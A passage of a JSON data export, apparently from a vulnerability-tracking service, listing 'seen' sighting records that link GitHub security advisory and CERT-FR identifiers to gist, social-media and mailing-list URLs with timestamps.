"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/c5e63c4f6733c7351923406c897b0d87", "content": "", "creation_timestamp": "2025-07-16T10:50:28.000000Z"}, {"uuid": "6bde2233-40dc-4a1d-825c-14008c151c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/c5e63c4f6733c7351923406c897b0d87", "content": "", "creation_timestamp": "2025-07-16T10:50:28.000000Z"}, {"uuid": "51bcc984-54b0-4f45-82f9-45a343d28653", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/3771de0bbedfc6f69e19cb674aea77f5", "content": "", "creation_timestamp": "2025-07-16T04:26:21.000000Z"}, {"uuid": "1440271c-f06f-4c12-ac44-acb128758bcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/3771de0bbedfc6f69e19cb674aea77f5", "content": "", "creation_timestamp": "2025-07-16T04:26:21.000000Z"}, {"uuid": "da517920-b297-4f05-956a-d94a4fc9a211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/3771de0bbedfc6f69e19cb674aea77f5", "content": "", "creation_timestamp": "2025-07-16T04:26:21.000000Z"}, {"uuid": "7e7b2178-ab71-44a8-bec1-090c6014cc44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/3771de0bbedfc6f69e19cb674aea77f5", "content": "", "creation_timestamp": "2025-07-16T04:26:21.000000Z"}, {"uuid": "38b24855-59f3-4c4b-a501-f1e2646fa2d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/0c1f52f7d324422eeda54765c3d41631", "content": "", "creation_timestamp": "2025-07-16T09:03:09.000000Z"}, {"uuid": "cb5dbdc0-42a5-462a-a0f3-8dd9ca8b4b6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/0c1f52f7d324422eeda54765c3d41631", "content": "", "creation_timestamp": "2025-07-16T09:03:09.000000Z"}, {"uuid": "17754d2a-b90b-42ed-9630-ae0c64d5ef85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/0c1f52f7d324422eeda54765c3d41631", "content": "", "creation_timestamp": "2025-07-16T09:03:09.000000Z"}, {"uuid": "1ec30120-e05e-4c9b-8a3e-d09385b212e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vgq5-3255-v292", "type": "seen", "source": "https://gist.github.com/safer-bot/45933a69f437440b7f18a4500149377e", "content": "", "creation_timestamp": "2025-07-16T10:52:33.000000Z"}, {"uuid": "205803d4-f21d-4122-b786-4aea31a432d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/45933a69f437440b7f18a4500149377e", "content": "", "creation_timestamp": "2025-07-16T10:52:33.000000Z"}, {"uuid": "5caabdc5-a440-41ca-8d79-b3b35331e172", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "d984dc8d-958c-4300-95b9-17f47fe2b65b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/9f045c38340848c1e4194fe8d01c9d57", "content": "", "creation_timestamp": "2025-07-16T12:50:04.000000Z"}, {"uuid": "4a922693-163c-4dac-86c5-f75e172bdb1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4q3-7g4q-x89m", "type": "seen", "source": "https://gist.github.com/safer-bot/e5ac7e49ce7135e506c75a08642d928e", "content": "", "creation_timestamp": "2025-07-16T04:30:54.000000Z"}, {"uuid": "d6276cf3-b7d2-4481-93a1-e939ed97c7d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2wrp-6fg6-hmc5", "type": "seen", "source": "https://gist.github.com/safer-bot/e5ac7e49ce7135e506c75a08642d928e", "content": "", "creation_timestamp": "2025-07-16T04:30:54.000000Z"}, {"uuid": "d53728dd-5361-4b95-88de-cee9c8edb780", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/e5ac7e49ce7135e506c75a08642d928e", "content": "", "creation_timestamp": "2025-07-16T04:30:54.000000Z"}, {"uuid": "ff529d31-45ea-4ba1-a6fb-2d82565fff08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ccgv-vj62-xf9h", "type": "seen", "source": "https://gist.github.com/safer-bot/e5ac7e49ce7135e506c75a08642d928e", "content": "", "creation_timestamp": "2025-07-16T04:30:54.000000Z"}, {"uuid": "59a67b4c-f472-4cf6-8c40-6dc76753cb11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rmj-mq67-h97g", "type": "seen", "source": "https://gist.github.com/safer-bot/e5ac7e49ce7135e506c75a08642d928e", "content": "", "creation_timestamp": "2025-07-16T04:30:54.000000Z"}, {"uuid": "bf7fa124-9ed0-4526-9307-3657a98feadb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgjh-9rj2-g67j", "type": "seen", "source": "https://gist.github.com/safer-bot/e5ac7e49ce7135e506c75a08642d928e", "content": "", "creation_timestamp": "2025-07-16T04:30:54.000000Z"}, {"uuid": "4054dd83-eee9-4367-bbf0-cb8cc84df7c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r3c-xf4w-jxjm", "type": "seen", "source": "https://gist.github.com/safer-bot/e5ac7e49ce7135e506c75a08642d928e", "content": "", "creation_timestamp": "2025-07-16T04:30:54.000000Z"}, {"uuid": "a4dd58c5-3c09-43a7-9cd6-3dff0577fd99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/f3e94ae8f29a78bc05ca76f4246b38aa", "content": "", "creation_timestamp": "2025-07-16T04:35:55.000000Z"}, {"uuid": "4ac2267d-9190-4a2d-8bd0-6fc20220ccbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c5v3-f4mm-7xmw", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114739516207051756", "content": "", "creation_timestamp": "2025-06-24T17:27:56.308225Z"}, {"uuid": "f99796da-0426-4aa7-acbd-496886d61f2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/38346a9351f29a3a56bfae039422e868", "content": "", "creation_timestamp": "2025-07-16T04:37:01.000000Z"}, {"uuid": "ca248c2f-105c-4c19-9b6e-80565aa07f32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/38346a9351f29a3a56bfae039422e868", "content": "", "creation_timestamp": "2025-07-16T04:37:01.000000Z"}, {"uuid": "ab090918-c86d-4745-9dba-6e2379fd9aac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "ab225f8a-9fc4-41ec-b722-dbbde80dc8ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "e67171df-717b-4b93-9f34-4aedc64527ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3832-9276-x7gf", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "5ce8a1ca-8b64-41ac-a25f-3024c901294f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f494-4xf7-xj35", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114676902054775526", "content": "", "creation_timestamp": "2025-06-13T16:04:20.316681Z"}, {"uuid": "a2b8184c-7f71-4fcf-b9d0-fdb63f2ccfc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/38346a9351f29a3a56bfae039422e868", "content": "", "creation_timestamp": "2025-07-16T04:37:01.000000Z"}, {"uuid": "ce0a427a-f172-4251-85cf-0001f7d651b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "6c289042-813e-40cd-845a-0bd42c5ea2e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r2pg-w96p-pcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "cbc93d75-9a89-407d-983a-cb68d687eff4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/3af08e2e3f8a5aedf7aa6bfe14734a27", "content": "", "creation_timestamp": "2025-07-16T09:22:35.000000Z"}, {"uuid": "68ff38d4-3191-4fe3-b7cd-125123378bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/6c638c59f38f1493d83ef705137d7bd7", "content": "", "creation_timestamp": "2025-07-16T10:55:59.000000Z"}, {"uuid": "3dccf923-b534-4370-a563-71ed18d813f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/4409ae4cd8ec93a7e40a4b22b8321b5b", "content": "", "creation_timestamp": "2025-07-16T13:40:40.000000Z"}, {"uuid": "51fd186c-fea6-45ec-af17-faff305bf732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/4409ae4cd8ec93a7e40a4b22b8321b5b", "content": "", "creation_timestamp": "2025-07-16T13:40:40.000000Z"}, {"uuid": "da6d2538-757e-4b83-846b-78377659c8f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F3GH-529W-V32X", "type": "seen", "source": "https://t.me/brutsecurity/1611", "content": "", "creation_timestamp": "2026-07-10T00:00:32.720569Z"}, {"uuid": "6b774553-eb88-440f-946f-3b365cfd2a58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vwqx-4fm8-6qc9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114819039202029902", "content": "", "creation_timestamp": "2025-07-08T18:31:40.164078Z"}, {"uuid": "1b4c88d4-5755-405c-a135-850f11b43195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-020", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3loxyfmqgxb2w", "content": "", "creation_timestamp": "2025-05-12T12:38:19.015566Z"}, {"uuid": "d4d56913-e505-4c56-9ab7-44579435905a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-020", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114494898036593566", "content": "", "creation_timestamp": "2025-05-12T12:38:20.769775Z"}, {"uuid": "4738830a-848a-4b9a-939e-c6ce3629fdab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/topickapp.bsky.social/post/3ltmgsgjf2e2i", "content": "", "creation_timestamp": "2025-07-10T13:30:03.500332Z"}, {"uuid": "0aa67b30-bba3-44fa-aaed-5036e3e7ae76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/6dc68b75d3a2f5766f034fc771605445", "content": "", "creation_timestamp": "2025-07-16T04:43:36.000000Z"}, {"uuid": "2a02bcff-2b65-4795-9cfc-b4ebfd3a8312", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/429eb5065c57b5f314e94285b42826c9", "content": "", "creation_timestamp": "2025-07-16T09:28:15.000000Z"}, {"uuid": "675e4f6f-ef6f-41da-9d32-96534fb546a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/cf8cb97b19cb7ba619c8d785a2d1d38d", "content": "", "creation_timestamp": "2025-07-16T11:11:06.000000Z"}, {"uuid": "33387b58-3c91-4b9b-b748-eeeeaae955c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/8570432847a97bb6642bd518a8decb68", "content": "", "creation_timestamp": "2025-07-16T12:56:12.000000Z"}, {"uuid": "563bf605-c7a0-4e15-84a1-7df0efb4e5e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/14b282bb97c9743f74e3550692e607e1", "content": "", "creation_timestamp": "2025-07-16T13:45:14.000000Z"}, {"uuid": "c066afb9-e9c5-421c-8c80-87543eb3a60e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/a0f60a8d5fe224be81cffcc8c0397e50", "content": "", "creation_timestamp": "2025-07-16T04:44:08.000000Z"}, {"uuid": "2f6d2905-2408-44e8-b8cd-ac3d63238f1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/a0f60a8d5fe224be81cffcc8c0397e50", "content": "", "creation_timestamp": "2025-07-16T04:44:08.000000Z"}, {"uuid": "1b536c64-012a-46fd-b082-3e2559560419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc42-6c7j-7h5r", "type": "seen", "source": "https://gist.github.com/safer-bot/a0f60a8d5fe224be81cffcc8c0397e50", "content": "", "creation_timestamp": "2025-07-16T04:44:08.000000Z"}, {"uuid": "713f51ca-388d-42a7-b9bc-7fe0938908f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/2d598c0e56d4c08d8d3ab8b2c3ce83f3", "content": "", "creation_timestamp": "2025-07-16T09:30:30.000000Z"}, {"uuid": "4b64a5b0-9c07-4df5-8b2e-3ef02568c5bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/a0f60a8d5fe224be81cffcc8c0397e50", "content": "", "creation_timestamp": "2025-07-16T04:44:08.000000Z"}, {"uuid": "a0125b4f-6a65-4426-abf1-9c12f5271b59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6r3c-xf4w-jxjm", "type": "seen", "source": "https://gist.github.com/safer-bot/a0f60a8d5fe224be81cffcc8c0397e50", "content": "", "creation_timestamp": "2025-07-16T04:44:08.000000Z"}, {"uuid": "04958f51-81a3-4675-af49-2da57c5d0aab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/2d598c0e56d4c08d8d3ab8b2c3ce83f3", "content": "", "creation_timestamp": "2025-07-16T09:30:30.000000Z"}, {"uuid": "7b4936d6-9948-4a87-a04d-8200f674eee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/cf8cb97b19cb7ba619c8d785a2d1d38d", "content": "", "creation_timestamp": "2025-07-16T11:11:06.000000Z"}, {"uuid": "164796c0-3f0a-4732-90c4-cde822a3a097", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-grmh-ww4v-5cgj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114701175434297633", "content": "", "creation_timestamp": "2025-06-17T22:57:21.890251Z"}, {"uuid": "907340ae-2d59-45a8-a3a2-b81e493e36e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hrwm-9436-5mv3", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/35", "content": "", "creation_timestamp": "2025-07-11T20:15:22.000000Z"}, {"uuid": "887d6aa3-0ff9-4859-a272-12a5f30d2558", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22wj-vf5f-wrvj", "type": "seen", "source": "https://gist.github.com/safer-bot/a5efe6c65fdda1e9b27da5c5a83d4ecd", "content": "", "creation_timestamp": "2025-07-16T04:50:47.000000Z"}, {"uuid": "899525d6-7e91-47f3-bb42-cea69aade764", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/2d598c0e56d4c08d8d3ab8b2c3ce83f3", "content": "", "creation_timestamp": "2025-07-16T09:30:30.000000Z"}, {"uuid": "6ba07a11-f546-423b-a945-ac7933ddb2b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/cf8cb97b19cb7ba619c8d785a2d1d38d", "content": "", "creation_timestamp": "2025-07-16T11:11:06.000000Z"}, {"uuid": "9d0d907a-1b67-40bc-877f-00e31a14761a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/beca2d59db48a78497bed77a53b69c44", "content": "", "creation_timestamp": "2025-07-16T13:44:41.000000Z"}, {"uuid": "ec68dc38-021e-482b-a6ee-d20d44d2d28b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/7c3c18d825bd276c1e08ed28ddc07745", "content": "", "creation_timestamp": "2025-07-16T14:32:14.000000Z"}, {"uuid": "54f67a1d-f7e9-460a-8c54-5253c8d05806", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/c4c64c45764712e3ac0ba621c5518451", "content": "", "creation_timestamp": "2025-07-16T14:31:41.000000Z"}, {"uuid": "42573d50-3eaa-4848-a705-a54ba1c5e756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/8b90b57146ec5c67bab7a2c865fdd98a", "content": "", "creation_timestamp": "2025-07-16T14:39:43.000000Z"}, {"uuid": "7e537ce1-e584-4da0-8f5d-efd1bb3a0dae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/8b90b57146ec5c67bab7a2c865fdd98a", "content": "", "creation_timestamp": "2025-07-16T14:39:43.000000Z"}, {"uuid": "2f8b82e1-9c8e-4350-88d0-e11f36bdfa0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/8b90b57146ec5c67bab7a2c865fdd98a", "content": "", "creation_timestamp": "2025-07-16T14:39:43.000000Z"}, {"uuid": "be05adbd-946e-4686-981f-7ba43e58f9a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q446-82vq-w674", "type": "seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "ea87ea5d-8a55-4f4e-9ceb-7e8cb939a0a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "7d6c5c67-3fbc-4845-bfdb-b0569e5e1146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "b99a39c0-8e0d-412c-8c02-47dee610d70f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc2q-x9mf-w3vf", "type": "seen", "source": "https://gist.github.com/safer-bot/2d598c0e56d4c08d8d3ab8b2c3ce83f3", "content": "", "creation_timestamp": "2025-07-16T09:30:30.000000Z"}, {"uuid": "d49438c9-4fa5-4472-8284-b214ccd1ed0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-453j-q27h-5p8x", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q3/35", "content": "", "creation_timestamp": "2025-07-11T20:15:22.000000Z"}, {"uuid": "e6c7ef1c-c17e-4bfe-a571-7c2781f05b9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/de1d2f168ac8c68d04050981a1883ee7", "content": "", "creation_timestamp": "2025-07-16T04:52:26.000000Z"}, {"uuid": "e24788f6-790a-4991-aa89-f770e81ce377", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrpq-qp53-qv56", "type": 